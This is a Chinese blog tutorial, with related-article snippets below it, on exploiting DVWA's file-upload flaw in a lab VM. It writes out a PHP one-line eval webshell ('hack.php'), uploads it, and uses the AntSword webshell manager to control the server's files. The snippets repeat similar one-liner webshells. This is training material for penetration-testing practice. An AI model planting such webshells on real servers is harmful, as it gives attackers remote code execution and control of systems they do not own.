蚁剑+DVWA(文件上传漏洞Upload)

最新推荐文章于 2024-05-29 21:50:40 发布
最新推荐文章于 2024-05-29 21:50:40 发布
阅读量6k 收藏 25
点赞数 5
文章标签: DVWA 蚁剑 文件上传漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42342141/article/details/102815402
版权

蚁剑+DVWA(文件上传漏洞Upload)

0x00 工具

虚拟机:owasp-bwa
主机:windows10
蚁剑 AntSword

0x01 文件上传漏洞(Upload)

第一步:登入DVWA
在这里插入图片描述注:这里使用的是low等级,毕竟目的是演示如何蚁剑的连接

第二步:准备hack.php

<?php
@eval($_POST['hack'])
?>

第三步:从DVWA上传hack.php

显示上传成功!
接下来我们来owasp-bwa服务器的目录下检查是否含有hack.php

cd /var/www/dvwa/hackable/uploads
ls

在这里插入图片描述
看到这就很 nice !

第四步:使用蚁剑来连接获得webshell
在这里插入图片描述在空白处 右键 -->添加数据

在这里插入图片描述
url处理
在这里插入图片描述

http://192.168.47.130/dvwa/vulnerabilities/upload/#
../../hackable/uploads/hack.php

把上面的url和文件路径拼在一起  记得去掉url后面的 #
然后得到下面的新 url 并打开
http://192.168.47.130/dvwa/vulnerabilities/upload/../../hackable/uploads/hack.php

打开后url变成:http://192.168.47.130/dvwa/hackable/uploads/hack.php
这就是蚁剑填入的链接

连接密码是指 hack.php 里 通过POST提交的 数据 即 hack

<?php
@eval($_POST['hack'])
?>

编码器一般选择 chr 就行了

点击 添加 然后 右键 添加的项目
在这里插入图片描述
接下来我们可以对目标服务器进行相关操作了!!!

e.g. 文件管理
我们可以试着去新建个文件试试 test.txt 然后到服务器的目录下检测
在这里插入图片描述
在这里插入图片描述
创建成功!!!

至此蚁剑通过DVWA文件上传漏洞的进行的连接就完成了

初学者L_言
关注
  • 5
    点赞
  • 25
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
如何用dvwa靶场上传文件,再用中国连接(high)
m0_73128456的博客
11-12 2810
单击右键,点击浏览网站,然后把dvwa后面全部删除,再按回车键,输入自己靶场的用户名和密码,再把密码等级改为高级(high)然后,再找cookie值。第五步:打开中国,增加数据,然后填写URL地址,填写自己的文件上传的位置。连接密码,这个时候,返回值为空,不要着急,只要你如下填写就行。前面是自己的IP地址,后面是自己上传文件的位置。第八步:点击你的数据,右键选择编辑数据,然后,点击请求信息,点击。第六步:先保存数据,现在还不可以,还要加靶场的cookie值。然后,加cookie值,粘贴,向我这样。
[极客大挑战 2019]Knife 1(连接/安装)
weixin_45253573的博客
11-18 797
打开环境 eval($_POST[“Syc”]); 作为后门用post提交一个字符串Syc 直接拿连接 连接之后在根目录下发现了flag 获取flag 介绍一下的安装: AntSword-Loader:https://github.com/AntSwordProject/AntSword-Loader antSword:https://github.com/AntSwordProject/antSword 这两个下载好之后解压 在AntSword-Loader-v4.0.3-win32
中国+burpsuite+webshell文件上传(超完整)
qq_50953689的博客
05-14 2669
之前:需要打开phpstudy的靶场环境 第一步 ➊准备木马文件 新建木马文件ttx.php,文件内容为 <?php @eval($_REQUEST["shell"]); ?> ➋保存后,将文件后缀名php改为jpg ➌登录dvwa测试环境,将security等级改为‘low’(其它模式,后端也做了校验,无法完成第⑤步的操作),然后打开文件上传模块 ➍上传文件,选择第②步保存的shell.jpg,在点击‘Upload’之前,打开burpsuite拦截功能并且点击‘Upl
【渗透测试】|文件上传
最新发布
yangdan_jiayou的博客
05-29 567
文件上传成功,根据提示的上传路径得到完整url路径http://192.xx.xx.xx/dvwa/hackable/uploads/cmd.php。url为:http://192.xx.xx.xx/dvwa/hackable/uploads/cmd.php。即:上传一句话木马文件后,重构连接服务器,管理服务器的问附件系统等,成功实现了文件上传攻击。完成后,中国的主页面出现一条记录,双击该记录,即可打开文件管理界面,如图。填写完成后,点击测试连接,若显示成功,连接成功时,此时可以将该数据进行添加。
DVWA文件上传漏洞upload
kirito_pio的博客
06-04 1644
目录 1、low级别(直接上传) 1.1 上传文件 1.2验证 2、medium级别(使用Burp Suite进行代理) 2.1 进行代理配置 2.2 文件上传 2.3 验证 3、high级别(进行文件合并) 3.1 文件创建 3.2上传及验证 1、low级别(直接上传) <?php if (isset($_POST['Upload'])) { $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable..
使用 文件上传漏洞挖掘
qq_65420677的博客
03-03 179
文件上传漏洞挖掘
关于的安装和使用
hanjunhao2002的博客
02-02 1343
加载器: https://github.com/AntSwordProject/AntSword-Loader 核心源码: https://github.com/AntSwordProject/antSword 两者都下好之后运行exe文件 发现需要初始化,进行初始化,路径为你下载的源码路径 初始化成功后如下 将小马上传服务器后url地址填写小马的位置 后面两者都选base64 连接密码为小马里面默认的123 添加后连接成功如下 可以轻松控制权限
中国安装使用教程
Karka_的博客
03-21 2000
中国是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。如上主要包括的下载,连接一句话木马,更改木马连接参数,绕过WAF。
CTF-Web-[极客大挑战 2019]Knife
归子莫的博客
05-03 5680
CTF-Web-[极客大挑战 2019]Knife 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客大挑战 2019]Knife 打开题目的实例 思路 看到这种题目,首先到处点一点,看...
pikachu + dvwa
09-22
其中,dvwa可能是DVWA的安装文件或配置文件,aaa可能是靶场的额外资料或者一个测试文件,pikachu可能是Pikachu平台的相关文件。而phpMyAdmin是一个流行的MySQL数据库管理工具,通常与Web应用的数据库管理有关,可能...
pikachu+dvwa+sqli.zip
09-08
标题中的“pikachu+dvwa+sqli.zip”是一个压缩包文件,包含了三个与网络安全相关的靶场资源。这些靶场通常用于网络安全教育、渗透测试训练或漏洞检测实践,帮助用户了解和学习如何发现并利用SQL注入(SQL Injection...
网安+安全工具安装+dvwa安装.pdf
11-22
网安+安全工具安装+dvwa安装.pdf
web网站文件上传漏洞和攻击-运维安全详细笔记
06-30
1. 准备有文件上传漏洞的网站,例如 DVWA。 2. 客户端浏览器找到文件上传漏洞的点,上传木马文件。 3. 将木马文件上传到网站,例如 shell.php。 4. 使用中国菜刀工具,通过上传的木马文件,获取服务器的 webshell。 ...
DVWA-DVWA渗透测试平台文件
03-07
DVWA全称为Damn Vulnerable Web Application,意为存在糟糕漏洞的web应用。它是一个基于PHP/MySQL开发的存在糟糕漏洞的web应用,旨在为专业的安全人员提供一个合法的环境,来测试他们的工具和技能。帮助web开发人员...
中国(AntSword)安装、使用教程
热门推荐
凝聚力安全团队
08-24 9万+
项目地址 加载器: https://github.com/eastmountyxz/AntSword-Experiment/ 项目核心源码: https://github.com/yuyuko233/AntSword 如果从github上下载很卡,可以去复制链接到githubd上下载 https://githubd.com 安装教程 我使用的渗透机为windows10,下载好会包含两个文件: 使用教程 插件安装 ...
从入门到魔改【二】· 编解码器原理及改造
buffedon的博客
12-25 2728
编解码器原理编解码器原理一、编码器编码器修改二、解码器 编解码器原理 编码器:对发送流量进行编码,服务端进行解码 解码器:对服务端对返回的流量进行解码 一、编码器 输入三个参数 pwd:连接密码,类型string。 data:传输的数据数组,类型string数组,。 ext:一些扩展选项,在一些场景可能会用到。 输出一个参数 data: 编码器处理后的数组,这个你可以通过代理查看post提交了哪些数据,和这里的data是完全一样的 下面是编码器默认生成的代码 原理:将编码和解密后的代码 全都
连接一句话木马
m0_64417923的博客
05-18 8187
一,在服务器上安装phpstudy 二,安装成功后启动apache 三,打开网站,看看是否成功 四,在攻击端安装菜刀 安装好后尝试用浏览器进入服务器搭建的网站(必须先设置好桥接) 输入服务器ip即可 cmd输入:ipconfig 正常情况下需要通过网站的漏洞,将一句话木马上传到网站上, 五,将一句话木马复制到网站 不过这次只是测试学习如何使用一句话木马的,所以直接将一句话木马复制到网站中: 创建一个文本,写入 <?php eval($_REQUEST[123..
DVWA靶场-----FIle Upload文件上传
m0_65712192的博客
11-14 1890
DVWA靶场-----FIle Upload文件上传
DVWA--upload
weixin_30385925的博客
05-21 232
文件上传漏洞 0x01了解文件上传漏洞的用处是用来干什么的 什么是文件上传漏洞文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件...
dvwa文件上传漏洞
05-11
DVWA(Damn Vulnerable Web Application)是一个专门为测试人员和安全研究人员设计的漏洞练习平台。文件上传漏洞是指攻击者通过绕过网站的文件上传功能,将自己恶意构造的文件上传到服务器上,然后利用该文件达到控制服务器的目的。一旦攻击者上传了恶意文件,他就可以在服务器上执行任意代码,并获得服务器的权限。 文件上传漏洞的成因通常是由于网站没有对上传文件类型、大小、后缀名等进行有效的限制。攻击者可以通过构造恶意文件,将其伪装成合法的文件格式,然后上传到服务器上,绕过了原本的文件类型检查,导致漏洞被利用。 为了防止文件上传漏洞的发生,开发人员需要对上传功能进行严格的限制,包括对上传文件类型、大小、后缀名等进行验证,并对上传的文件进行安全处理。此外,服务器也需要做好安全设置和权限控制,以避免攻击者利用漏洞获得服务器权限。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值